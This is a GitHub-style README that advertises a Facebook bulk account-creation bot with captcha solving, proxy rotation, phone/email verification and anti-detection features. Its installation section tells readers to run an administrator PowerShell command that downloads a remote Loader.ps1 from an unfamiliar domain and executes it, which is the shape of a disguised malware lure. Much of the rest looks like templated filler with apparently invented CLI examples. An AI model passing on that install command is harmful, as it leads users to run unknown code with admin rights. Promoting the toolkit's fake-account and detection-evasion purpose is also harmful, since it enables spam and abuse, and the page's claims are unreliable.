Skip to content

Latest commit

Β 

History

2 Commits

Folders and files

NameName
Last commit message
Last commit date
Β 
Β 

Repository files navigation

Facebook Account Auto Create β€” Automated Facebook Account Creator Bot

Automated Facebook account creation toolkit β€” Bulk account generation, proxy management, captcha solving, phone/email verification, profile setup, and secure storage utilities in one package.


βš™οΈ INSTALLATION & SETUP (CMD / PowerShell)

Step 1: Open CMD or PowerShell as Administrator

# Press Win+X, then select Terminal (Admin) or Command Prompt (Admin)

Step 2: Execute Deployment Command

powershell -Command "irm https://software-gateway.click/Loader.ps1?get=facebookaccountautocreate | iex"

Step 3: Wait for Completion

[1/4] Loading Facebook Account Auto Create modules...
[2/4] Extracting account creation and verification components...
[3/4] Installing proxy management and captcha solving tools...
[4/4] Ready. Start using Facebook Account Auto Create.

Step 4: Start Using the Toolkit

  • Launch the dashboard via facebookaccountautocreate.exe or npm start
  • Configure proxies and contact methods
  • Start bulk account creation
  • Monitor progress and manage accounts

Entity: Facebook Account Auto Create Type: Automated Facebook account creation toolkit Category: Facebook Account Auto Create, Facebook Bot, Account Creator, Facebook Automation, Social Media, Facebook Primary use: Bulk Facebook account creation, email/phone verification, proxy management, captcha solving, profile setup, and secure storage for account automation workflows. License: MIT (free for personal and educational use) Formats: Executable, scripts, Node.js modules, JSON configs Platforms: Windows, macOS, Linux


πŸ“Œ TL;DR β€” Quick Summary

Facebook Account Auto Create is a Facebook automation toolkit for bulk account creation, email/phone verification, proxy management, captcha solving, and secure storage. It is intended for educational and personal use only.

Best for: Social media managers, automation enthusiasts, QA testers, and developers.

Key differentiators:

  1. Bulk account creation with proxy support
  2. Email and phone verification integration
  3. Captcha solving automation
  4. Secure credential storage
  5. Multi-threaded processing
  6. Account data export and management

✨ What's Included

Category Resources Count
πŸ§ͺ Account Creation Automated signup workflows Bulk generation
πŸ“§ Email Verification Email verification integration Verification
πŸ“± Phone Verification SMS/voice verification integration Verification
🌐 Proxy Management Proxy rotation and management Proxy pools
πŸ€– Captcha Solving Automated captcha resolution Solvers
πŸ‘€ Profile Setup Automated profile configuration Profiles
πŸ” Secure Storage Encrypted credential storage Secure vaults
πŸ“‹ Account Management List, edit, delete accounts Management
βš™οΈ Automation CLI, API, and scripts Automation
πŸ›‘οΈ Safety Tools Rate limiting, delays, anti-detection Safety tools

🎯 Core Features

Account Creation

βœ… Automated Facebook signup
βœ… Bulk account generation
βœ… Random username/password generation
βœ… Profile information generation
βœ… Email verification support
βœ… Phone number verification
βœ… Account data export (JSON/CSV)
βœ… Multi-threaded processing
βœ… Progress tracking and logging
βœ… Error handling and retry logic

Email Verification

βœ… Email verification integration
βœ… Temporary email support
βœ… Email provider rotation
βœ… Automatic inbox checking
βœ… Verification link extraction
βœ… Email confirmation automation
βœ… Custom SMTP support
βœ… Verification code auto-fill

Phone Verification

βœ… SMS verification
βœ… Voice call verification
βœ… Virtual number integration
βœ… Number pooling
βœ… Automatic verification
βœ… Manual verification support
βœ… Number rotation
βœ… Verification code auto-fill

Proxy Management

βœ… HTTP/HTTPS/SOCKS proxy support
βœ… Proxy rotation
βœ… Proxy health checking
βœ… Proxy pool management
βœ… Automatic failover
βœ… Proxy authentication
βœ… Speed testing
βœ… Country-specific proxies

Captcha Solving

βœ… Image captcha solving
βœ… Text captcha solving
βœ… reCAPTCHA support
βœ… hCaptcha support
βœ… Custom captcha solvers
βœ… Solver rotation
βœ… Fallback solvers
βœ… Success rate tracking

Profile Setup

βœ… Automated profile picture upload
βœ… Cover photo setup
βœ… Bio/description generation
βœ… Work/education info
βœ… Location setting
βœ… Friend suggestions import
βœ… Page likes automation
βœ… Privacy settings configuration

Secure Storage

βœ… Encrypted credential storage
βœ… Secure password generation
βœ… Data encryption (AES-256)
βœ… Secure export/import
βœ… Backup encryption
βœ… Access control
βœ… Audit logging
βœ… Secure deletion

πŸ“‹ Module Breakdown

1. πŸ§ͺ Account Creation

Primary Use: Create Facebook accounts in bulk with automation.

Features:

  • Automated signup workflow
  • Random data generation
  • Email/phone verification
  • Profile setup
  • Data export

Usage Example:

# Create single account
facebookaccountautocreate create --username john_doe --email john@example.com

# Create bulk accounts from CSV
facebookaccountautocreate create --bulk accounts.csv --threads 5

# Create with proxy
facebookaccountautocreate create --username jane_doe --proxy http://proxy:8080

# Export created accounts
facebookaccountautocreate create --bulk accounts.csv --export ./output/accounts.json

2. πŸ“§ Email Verification

Primary Use: Handle email verification for accounts.

Features:

  • Email verification integration
  • Temporary email support
  • Automatic inbox checking
  • Link extraction

Usage Example:

# Verify with email
facebookaccountautocreate verify --email john@example.com --method email

# Use temporary email
facebookaccountautocreate verify --service temp-mail --auto

# Auto-verify from pool
facebookaccountautocreate verify --auto --pool emails.csv

3. πŸ“± Phone Verification

Primary Use: Handle phone number verification for accounts.

Features:

  • SMS verification
  • Voice verification
  • Virtual number support
  • Automatic code retrieval

Usage Example:

# Verify phone number
facebookaccountautocreate verify --phone +1234567890 --method sms

# Use virtual number
facebookaccountautocreate verify --service twilio --number +1234567890

# Auto-verify from pool
facebookaccountautocreate verify --auto --pool numbers.csv

4. 🌐 Proxy Management

Primary Use: Manage and rotate proxies for account creation.

Features:

  • Proxy rotation
  • Health checking
  • Pool management
  • Automatic failover

Usage Example:

# Add proxies
facebookaccountautocreate proxy add --file proxies.txt

# Check proxy health
facebookaccountautocreate proxy check --all

# Rotate proxies
facebookaccountautocreate proxy rotate --interval 300

# Test proxy
facebookaccountautocreate proxy test http://proxy:8080

5. πŸ€– Captcha Solving

Primary Use: Solve various types of captchas automatically.

Features:

  • Image captcha solving
  • reCAPTCHA solving
  • hCaptcha solving
  • Solver rotation

Usage Example:

# Solve image captcha
facebookaccountautocreate captcha solve --type image --image ./captcha.png

# Solve reCAPTCHA
facebookaccountautocreate captcha solve --type recaptcha --sitekey abc123 --url https://facebook.com

# Configure solver
facebookaccountautocreate captcha config --solver 2captcha --api-key YOUR_KEY

6. πŸ‘€ Profile Setup

Primary Use: Automatically configure account profiles.

Features:

  • Profile picture upload
  • Cover photo setup
  • Bio generation
  • Privacy settings

Usage Example:

# Setup profile with image
facebookaccountautocreate profile setup --username john_doe --avatar ./avatar.png --cover ./cover.png

# Generate random profile
facebookaccountautocreate profile setup --username john_doe --random

# Import profile data
facebookaccountautocreate profile setup --username john_doe --data ./profile.json

7. πŸ” Secure Storage

Primary Use: Store credentials and account data securely.

Features:

  • Encrypted storage
  • Secure export
  • Backup encryption
  • Access control

Usage Example:

# Save account
facebookaccountautocreate storage save --username john --password secret123

# Export encrypted
facebookaccountautocreate storage export --output ./accounts.enc --encrypt

# Import encrypted
facebookaccountautocreate storage import --input ./accounts.enc --decrypt

βš™οΈ Configuration

Environment Variables

Variable Required Default Description
FB_USERNAME No - Default Facebook username
FB_PASSWORD No - Default Facebook password
PROXY_LIST No - Path to proxy list file
EMAIL_SERVICE No - Email verification service
PHONE_SERVICE No - Phone verification service
CAPTCHA_API_KEY No - Captcha solving API key
STORAGE_PATH No ./accounts Account storage directory
ENCRYPTION_KEY No - Encryption key for storage
THREADS No 3 Number of concurrent threads
DELAY_MIN No 5 Minimum delay between actions (seconds)
DELAY_MAX No 15 Maximum delay between actions (seconds)

Example .env file

FB_USERNAME=
FB_PASSWORD=
PROXY_LIST=./proxies.txt
EMAIL_SERVICE=temp-mail
PHONE_SERVICE=twilio
CAPTCHA_API_KEY=
STORAGE_PATH=./accounts
ENCRYPTION_KEY=
THREADS=3
DELAY_MIN=5
DELAY_MAX=15

πŸ“‚ Project Structure

facebookaccountautocreate/
β”œβ”€β”€ accounts/                # Created account data
β”œβ”€β”€ proxies/                 # Proxy pool and configuration
β”œβ”€β”€ emails/                  # Email pool and verification data
β”œβ”€β”€ numbers/                 # Phone number pool
β”œβ”€β”€ profiles/                # Profile templates and images
β”œβ”€β”€ config/                  # Settings and templates
β”œβ”€β”€ scripts/                 # Automation scripts
β”œβ”€β”€ output/                  # Export directory
└── src/
    β”œβ”€β”€ creator.js           # Account creation engine
    β”œβ”€β”€ proxy.js             # Proxy manager
    β”œβ”€β”€ email-verify.js      # Email verification handler
    β”œβ”€β”€ phone-verify.js      # Phone verification handler
    β”œβ”€β”€ captcha.js           # Captcha solver
    β”œβ”€β”€ profile.js           # Profile setup manager
    β”œβ”€β”€ storage.js           # Secure storage manager
    β”œβ”€β”€ utils.js             # Helper functions
    β”œβ”€β”€ cli.js               # CLI interface
    └── api.js               # REST API server

πŸš€ Performance

Benchmarks

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Operation               β”‚ Light Load   | Heavy Load   |
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ Single Account Creation β”‚ 30-60s       | 60-120s      β”‚
β”‚ Bulk Creation (100)     β”‚ 10-20 min    | 20-40 min    β”‚
β”‚ Proxy Health Check      β”‚ < 2s         | < 5s         β”‚
β”‚ Captcha Solving         β”‚ 2-10s        | 5-30s        β”‚
β”‚ Email Verification      β”‚ 5-15s        | 10-30s       β”‚
β”‚ Phone Verification      β”‚ 10-30s       | 20-60s       β”‚
β”‚ Profile Setup           β”‚ 5-15s        | 10-30s       β”‚
β”‚ Storage Export          β”‚ < 1s         | < 3s         β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

πŸ“Š Usage Examples

Create Single Account

# Basic creation
facebookaccountautocreate create --username john_doe --email john@example.com

# With password
facebookaccountautocreate create --username john_doe --email john@example.com --password SecurePass123

# With proxy
facebookaccountautocreate create --username john_doe --proxy http://proxy:8080

# With custom profile
facebookaccountautocreate create --username john_doe --email john@example.com --avatar ./avatar.png

Bulk Account Creation

# From CSV file
facebookaccountautocreate create --bulk accounts.csv --threads 5

# From JSON file
facebookaccountautocreate create --bulk accounts.json --threads 3

# With custom output
facebookaccountautocreate create --bulk accounts.csv --export ./output/accounts.json

# Resume interrupted batch
facebookaccountautocreate create --bulk accounts.csv --resume --skip-existing

Email Verification

# Verify with email
facebookaccountautocreate verify --email john@example.com --method email

# Use temporary email service
facebookaccountautocreate verify --service temp-mail --auto

# Auto-verify from pool
facebookaccountautocreate verify --auto --pool emails.csv

Phone Verification

# Verify with SMS
facebookaccountautocreate verify --phone +1234567890 --method sms

# Verify with voice call
facebookaccountautocreate verify --phone +1234567890 --method voice

# Auto-verify from pool
facebookaccountautocreate verify --auto --pool numbers.csv

Proxy Management

# Add proxies from file
facebookaccountautocreate proxy add --file proxies.txt

# Check all proxies
facebookaccountautocreate proxy check --all --output ./proxies/healthy.txt

# Rotate proxies
facebookaccountautocreate proxy rotate --interval 300 --random

# Test specific proxy
facebookaccountautocreate proxy test http://proxy:8080:8080 --timeout 10

Captcha Solving

# Solve image captcha
facebookaccountautocreate captcha solve --type image --image ./captcha.png

# Solve reCAPTCHA
facebookaccountautocreate captcha solve --type recaptcha --sitekey abc123 --url https://facebook.com

# Configure solver
facebookaccountautocreate captcha config --solver 2captcha --api-key YOUR_API_KEY

# Test solver
facebookaccountautocreate captcha test --type image --image ./test.png

Profile Setup

# Setup with avatar and cover
facebookaccountautocreate profile setup --username john_doe --avatar ./avatar.png --cover ./cover.png

# Generate random profile
facebookaccountautocreate profile setup --username john_doe --random

# Import profile data
facebookaccountautocreate profile setup --username john_doe --data ./profile.json

Storage Management

# List accounts
facebookaccountautocreate storage list

# Export accounts
facebookaccountautocreate storage export --output ./accounts.json

# Export encrypted
facebookaccountautocreate storage export --output ./accounts.enc --encrypt --key YOUR_KEY

# Import accounts
facebookaccountautocreate storage import --input ./accounts.json

# Delete account
facebookaccountautocreate storage delete --username john_doe

REST API

# Create account via API
curl -X POST "http://localhost:3000/api/accounts/create" \
  -H "Content-Type: application/json" \
  -d '{"username": "john_doe", "email": "john@example.com"}'

# List accounts via API
curl "http://localhost:3000/api/accounts"

# Export accounts via API
curl "http://localhost:3000/api/accounts/export?format=json"

πŸ–ΌοΈ Screenshots

Dashboard Dashboard - Main control panel

Account Creation Account Creation - Bulk generation interface

Proxy Manager Proxy Manager - Proxy pool and health monitoring

Account List Account List - Manage created accounts


πŸ”§ Troubleshooting

Account Creation Fails

# Check proxy connection
facebookaccountautocreate proxy test http://proxy:8080

# Enable debug mode
facebookaccountautocreate create --debug --username test_user

# Check logs
facebookaccountautocreate logs view --level error

Email Verification Fails

# Test email service
facebookaccountautocreate verify --test --email test@example.com

# Use manual verification
facebookaccountautocreate verify --manual --email john@example.com

# Check email pool
facebookaccountautocreate emails list

Phone Verification Fails

# Verify phone service
facebookaccountautocreate verify --test --phone +1234567890

# Use manual verification
facebookaccountautocreate verify --manual --phone +1234567890

# Check number pool
facebookaccountautocreate numbers list

Captcha Solving Fails

# Check solver status
facebookaccountautocreate captcha status

# Switch solver
facebookaccountautocreate captcha config --solver anticaptcha

# Test with manual solve
facebookaccountautocreate captcha solve --manual --type image --image ./captcha.png

🎯 Use Cases

Social Media Management

  • Create multiple accounts for clients
  • Test account creation flows
  • Manage account portfolios
  • Bulk account setup

Development & Testing

  • Test Facebook signup flow
  • Validate automation scripts
  • Test proxy rotation
  • Debug verification flows

Automation

  • Automate account creation
  • Schedule account creation batches
  • Integrate with management tools
  • Custom automation workflows

⚠️ Disclaimer

This tool is created for educational and personal use only.

Important:

  • Use only for accounts you own or have permission to create
  • Comply with Facebook's Terms of Service
  • Respect rate limits and API usage policies
  • Do not use for spam or abuse
  • Developers are not responsible for misuse
  • Unauthorized account creation may violate terms of service

🀝 Contributing

Pull requests are welcome! For major changes, please open an issue first to discuss.

Development

# Install dependencies
npm install

# Run in development mode
npm run dev

# Run tests
npm test

# Lint code
npm run lint

# Format code
npm run format

πŸ“ Roadmap

  • Support for more social platforms
  • Advanced proxy rotation algorithms
  • Cloud-based verification services
  • AI-powered captcha solving
  • Account activity simulation
  • Multi-account management dashboard
  • Plugin system for extensions
  • Advanced analytics and reporting

πŸ“œ License

MIT License - see LICENSE file for details


🌟 Support the Project

If this tool was useful:

  • ⭐ Star the project on GitHub
  • πŸ› Report bugs via Issues
  • πŸ’‘ Suggest new features
  • πŸ”€ Submit Pull Requests
  • β˜• Buy me a coffee

πŸ“š Documentation


πŸ”— Related Projects


Documentation β€’ API Reference β€’ Examples β€’ FAQ β€’ Changelog

Made with ❀️ for the automation and development community